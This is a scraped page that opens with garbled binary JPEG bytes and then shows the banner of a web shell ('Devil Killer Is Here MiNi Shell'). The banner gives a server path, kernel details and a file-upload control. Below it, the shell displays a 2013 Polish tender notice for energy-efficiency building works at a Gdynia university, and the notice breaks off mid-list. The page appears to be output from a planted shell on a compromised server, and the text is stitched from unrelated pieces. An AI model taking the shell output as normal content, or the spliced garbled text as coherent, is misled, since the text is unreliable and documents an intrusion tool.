JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130409/139326-N-2013.html

<p class="kh_header"><b>Gdynia: ZARZĄDZANIE ENERGIĄ BUDYNKU UŻYTECZNOŚCI PUBLICZNEJ
WYŻSZEJ SZKOŁY ADMINISTRACJI I BIZNESU
W GDYNI</b><br>
<b>Numer ogłoszenia: 139326 - 2013; data zamieszczenia: 09.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wyższa Szkoła Administracji i Biznesu im. Eugeniusza Kwiatkowskiego w Gdyni , Ul. Kielecka 7, 81-303 Gdynia, woj. pomorskie, tel. 58 660 74 00, faks 58 621 12 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsaib.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wsaib.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Uczelnia niepubliczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZARZĄDZANIE ENERGIĄ BUDYNKU UŻYTECZNOŚCI PUBLICZNEJ
WYŻSZEJ SZKOŁY ADMINISTRACJI I BIZNESU
W GDYNI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 (finansowane przy udziale dofinansowania i pożyczki udzielonej przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w ramach Systemu Zielonych Inwestycji )
1.Ocieplenie stropodachu wentylowanego o powierzchni 721 m2, granulatem wełny mineralnej grubości 15 cm  o współczynniku  przewodności 0,04W/mK.
2.Ocieplenie stropu pełnego o powierzchni 549 m2, styropapą o grubości 20 cm o współczynniku przewodności 0,04W/mK.
Podczas kalkulacji ocieplenia stropu pełnego styropapą należy uwzględnić części dachu wykonaną przez Zamawiającego
3.Kompleksowa wymiana instalacji ciepłej wody i cyrkulacji o dł. 537 mb w tym: przewody (rurociągi) z rur wielowarstwowych polietylenowych z wkładką aluminiową o średnicy Ř16 ÷ 50 i łącznej długości 537mb  izolacja o współczynniku przewodności 0,035W/mK grubości od 6 do 30mm i łącznej długości 537mb zawory regulacyjne  o średnicy Ř15÷50 - 12 szt. pompa obiegowa o wydajności 0,096dm3/s i wysokości podnoszenia 8,72kPa.
Wykonanie prac odtworzeniowych przywracających walory użytkowe i estetyczne pomieszczeń do stanu pierwotnego przed realizacją zadania ( kalkulacja własna Wykonawcy ).
Podczas kalkulacji instalacji ciepłej wody należy uwzględnić część instalacji na 3 piętrze wykonaną przez Zamawiającego.
W kalkulacji należy wycenić baterie umywalkowe czasowe.

4.Modernizacja i budowa wentylacji mechanicznej z odzyskiem ciepła poprzez wymiennik obrotowy (4szt.) krzyżowy(1szt.) : naw-wyw 1 : wydajność 10000m3/h moc nagrzewnicy 53,62kW, naw-wyw 2 : wydajność 10000m3/h moc nagrzewnicy 53,62kW, naw-wyw 3 : wydajność 12300m3/h moc nagrzewnicy 64,82kW, naw-wyw 4 : wydajność 9100m3/h moc nagrzewnicy 46,83kW, naw-wyw 5 : wydajność 11000m3/h moc nagrzewnicy 55,93kW.
Wykonanie prac elektrycznych w zakresie wykonania rozdzielnicy elektrycznej TW na IV kondygnacji zgodnie z założeniami do projektu wentylacji i schematem rozdzielnicy dla układów wentylacyjnych (kalkulacja własna Wykonawcy).
Podczas kalkulacji układów wentylacyjnych należy uwzględnić części instalacji wykonanych przez Zamawiającego (dokumentacja powykonawcza), na wcześniejszym etapie.
Wykonanie prac odtworzeniowych przywracających walory użytkowe i estetyczne pomieszczeń do stanu pierwotnego przed realizacją zadania ( kalkulacja własna Wykonawcy ).
Należy wykonać kalkulację własną konstrukcji wsporczej pod centrale wentylacyjne.
Zamawiający rezygnuje z instalacji schładzającej w układach wentylacji mechanicznej w związku z tym pozycje przedmiarowe w tym zakresie nie obowiązują dla obliczenia wartości zadania.
    
5. Montaż węzła ciepłowniczego z pełną automatyką ,modernizacja /wymiana instalacji centralnego ogrzewania, w tym grzejniki płytowe stalowe -149szt. zawory termostatyczne i podpionowe -149szt. zawory odcinające - 149szt. przewody (rurociągi) rur wielowarstwowych polietylenowych z wkładką aluminiową  o średnicach: Ř 16÷ 50 i łącznej długości 2370 mb.  
W oparciu o założenia projektowe wykonanie rozdzielnicy elektrycznej dla potrzeb węzła cieplnego (kalkulacja własna Wykonawcy). Wykonanie prac odtworzeniowych przywracających walory użytkowe i estetyczne pomieszczeń do stanu pierwotnego przed realizacją zadania ( kalkulacja własna Wykonawcy ).
    
Zadanie nr 2 (finansowane ze środków własnych Zamawiającego zakres prac może ulec zmianie w trakcie realizacji zadania w zakresie do 25 % oferowanej wartości brutto)
1. Wykonanie instalacji wewnętrznej zimnej wody użytkowej  budynku.   
Realizacja zadania powinna odbywać się równolegle z realizacją wymiany instalacji ciepłej wody i cyrkulacji.
Przy sporządzaniu wyceny zadania należy pominąć prace związane z dostawą i montażem zestawu hydroforowego które zostały zaniechane.

2. Wykonanie instalacji wewnętrznej kanalizacji sanitarnej w obrębie budynku 
Prace realizowane równolegle z pracami wewnętrznej instalacji wodnej budynku.

B. Szczegółowy opis zakresu rzeczowego robót stanowi
-dokumentacje projektowe, wraz z dokumentacją powykonawczą części robót instalacji wentylacji mechanicznej i cwu już zrealizowanych stanowiące Załącznik nr 1 ;
-przedmiary robót w postaci przedmiaru lub kosztorysu ślepego 
Przedmiar robót wod-kan zawiera :
-instalacje wody ciepłej wraz z cyrkulacją, pozycje przedmiarowe od 75 do 115 (dla zadania nr 1)
-instalacje wody zimniej pozycje przedmiarowe od 21 do 74 (dla zadania nr 2)
-instalacje wewnętrznej kanalizacji sanitarnej pozycje przedmiarowe od 116 do 148 (dla zadania nr 2)
Przedmiar robót (kosztorys ślepy) jest tylko elementem pomocniczym dla wyceny składanej oferty i nie może stanowić roszczeń w przypadku odstępstw obmiarowych i zakresu robót w nim zawartych, wobec Zamawiającego). 
Z uwagi na fakt , że część robót została zrealizowana przez Zamawiającego na wcześniejszym etapie , wskazane jest uczestnictwo Wykonawcy w spotkaniu zorganizowanym przez Zamawiającego w siedzibie WSAiB w Gdyni ul. Kielecka 7, celem wskazania prac już zrealizowanych a ujętych w dokumentacji wykonawczej wentylacji mechanicznej budynku i ciepłej wody.  Zamawiający w zał. nr .1, przedstawił obszary projektu wykonawczego, które należy wykonać i dołączyć do zrealizowanej wcześniej instalacji wentylacyjnej.
Na Wykonawcy ciąży obowiązek wykonania całościowej dokumentacji po wykonawczej z uwzględnieniem wszystkich jej elementów, jak również przeprowadzenia prób rozruchowych, regulacji całości wentylacji mechanicznej budynku wraz z elementami wykonanymi wcześniej przez Zamawiającego.
Prace objęte zadaniem przetargowym, będą prowadzone w czynnym obiekcie użyteczności publicznej i wymagają ścisłego zachowania uzgodnionego z Zamawiającym Harmonogramu Robót.
Wykonawca przyjmuje tę informacje i w trakcie realizacji nie może uzasadniać opóźnień w prowadzonych pracach tym stanem rzeczy.

C. UWAGA! 
O ile w dokumentacji występuje nazwa producenta związana z produktem - Zamawiający dopuszcza możliwość wykorzystania produktów równoważnych tzn. spełniających wszystkie minimalne parametry techniczne co wskazane za pomocą znaku towarowego czy pochodzenia produkty, a to oznacza, że: 
1) Użyte w opisie przedmiotu zamówienia nazwy własne materiałów, urządzeń, elementów konstrukcyjnych, itp. określają minimalne parametry techniczne wymagane przez Zamawiającego;
2) Dopuszcza się użycie do realizacji przedmiotowych robót budowlanych i instalacyjnych produktów i materiałów tylko równoważnych, co do ich jakości i docelowego przeznaczenia, oraz spełnianych funkcji i walorów użytkowych co jest równoznaczne z tym, że Zamawiający za produkty równoważne uzna tylko takie, które spełnią wszystkie minimalne parametry techniczne produktu lub materiału wskazanego z nazwy handlowej, a także że zostaną zachowane wszystkie standardy techniczne i jakościowe niezbędne do prawidłowego funkcjonowania realizowanego zamówienia;
3) Wykonawca, może zastosować rozwiązania równoważne do opisywanych w dokumentacji projektowej w załączniku nr 1 do specyfikacji, ale jest obowiązany wykazać, że oferowane przez niego materiały, urządzenia, itp. spełniają wszystkie minimalne parametry techniczne wymagane przez Zamawiającego - stosownie do art. 30 ust. 5 ustawy. Obowiązek Wykonawcy wykazania równoważności produktu jest obowiązkiem wynikającym z ustawy, który może być spełniony w jakikolwiek sposób pozwalający Zamawiającemu jednoznacznie stwierdzić zgodność oferowanych w ofercie produktów i/lub urządzeń z wymaganiami określonymi w specyfikacji, co winno zostać wykazane na etapie składania ofert zawierających produkty równoważne. Zamawiający nie wyraża zgody, by proponowane w ofercie rozwiązania (urządzenia, materiały) równoważne były prototypami;
4) Wykonawca, który zaoferuje produkty i/lub urządzenia równoważne wymagające zmiany  dokumentacji projektowej jest zobowiązany do uzyskania zgody projektanta na wprowadzenie tych zmian lub na wykonanie utworu zależnego - zgodnie z ustawą z dnia 4 lutego 1994r. o prawie autorskim i prawach pokrewnych (tekst jednolity: Dz. U. 2006 r. Nr 90 poz. 631 ze zm.). Powyższe wykonawca musi uzyskać własnym staraniem i kosztem, gwarantując jednocześnie wykonanie zamówienia w wymaganym terminie a także zachowanie postanowień art. 36a ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane (tekst jedn. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.);
5) Wykonawca, który zaoferuje produkty i/lub urządzenia równoważne wymagające zmiany  posiadanych decyzji, będzie musiał w ramach wykonania zamówienia w imieniu Zamawiającego, uzyskać wymagane decyzje własnym staraniem i kosztem, gwarantując jednocześnie wykonanie zamówienia w terminie realizacji zamówienia;

D. Zamawiający wymaga, by wykonawca  udzielił 3 - letniej  pisemnej gwarancji jakości na wykonane roboty budowlane.
E. W celu lepszego zapoznania się z przedmiotem zamówienia Zamawiający organizuje spotkanie z Wykonawcami przy udziale służb Zamawiającego dnia 16.04.2013 o godz. 12.00 w siedzibie Zamawiającego Gdynia ul. Kielecka 7, pok. nr 304 ponadto zaleca:
a) dokonanie przez wykonawcę (na własny koszt, ryzyko i odpowiedzialność) uzgodnionych telefonicznie wizji lokalnej terenu realizacji przedmiotu zamówienia i jego otoczenia,
b) szczegółowe zapoznanie się z dokumentacją, o której mowa w lit. B, 
c) zdobycie wszelkich dodatkowych informacji, które mogą być konieczne do przygotowania oferty i realizacji zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.10.00-6, 45.26.19.00-3, 45.44.30.00-4, 45.32.10.00-3, 45.33.00.00-9, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca składający ofertę zobowiązany jest do wniesienia wadium w terminie do dnia 25.04.2013r , do godz.13.00 w wysokości: 20.000 zł (słownie : dwadzieścia tysięcy złotych).
2. Wadium może być wniesione w jednej lub kilku następujących form:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest poręczeniem pieniężnym.
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty , o których mowa w art. 6B ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. O utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109 poz. 1158 z późn. Zmianami).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto nr 33 1320 1120 2451 1344 2000 0006 w Banku Pocztowym S.A.. Termin wniesienia wadium w formie pieniądza jest terminem wpływu środków z tytułu wadium na konto zamawiającego ( tj. Do godz. 13.00 dnia 25.04.2013r)
Wadium wnoszone w formie innej niż w pieniądzu należy złożyć w oryginale w siedzibie Zamawiającego - pok. nr 217 (Główny księgowy) do godz. 13.00 dnia 25.04.2013 r., do oferty dołączyć kopię potwierdzoną za zgodność z oryginałem przez upoważnionego przedstawiciela wykonawcy.
Brak wadium złożonego w wyznaczonym terminie spowoduje wykluczenie wykonawcy z postępowania.
Warunki zwrotu i zatrzymania wadium zostaną dokonane zgodnie z art. 46 ustawy Prawo Zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawców, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli co najmniej dwie roboty budowlane polegające na budowie, przebudowie lub remoncie budynku wraz z budową instalacji wentylacyjnej i centralnego ogrzewania z wymianą grzejników  o wartości robót nie mniejszej niż 2 000 000, 00 PLN (słownie złotych: dwa miliony PLN) brutto;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawców, którzy dysponują :
a. Osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej w minimum ograniczonym zakresie lub odpowiadające im uprawnienia (stwierdzenie) przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie wydane na podstawie wcześniej obowiązujących przepisów.
b. Osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności sanitarnej (w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych i kanalizacyjnych) lub odpowiadające im uprawnienia (stwierdzenie przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie wydane na podstawie wcześniej obowiązujących przepisów.
c. Osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacji elektrycznej lub odpowiadające im uprawnienia (stwierdzenie) przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawców posiadających środki własne lub zdolność kredytową do wysokości 1 000 000,00 PLN (słownie : jeden milion PLN)
Wykonawców ubezpieczonych od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną sumę ubezpieczeniową/gwarancyjną 2 000 000,00 PLN (słownie złotych: dwa miliony PLN).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawców ,którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli co najmniej dwie roboty budowlane polegające na budowie, przebudowie lub remoncie budynku wraz z budową instalacji wentylacyjnej i centralnego ogrzewania z wymianą grzejników  o wartości robót nie mniejszej niż 2 000 000, 00 PLN (słownie złotych: dwa miliony PLN) brutto;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

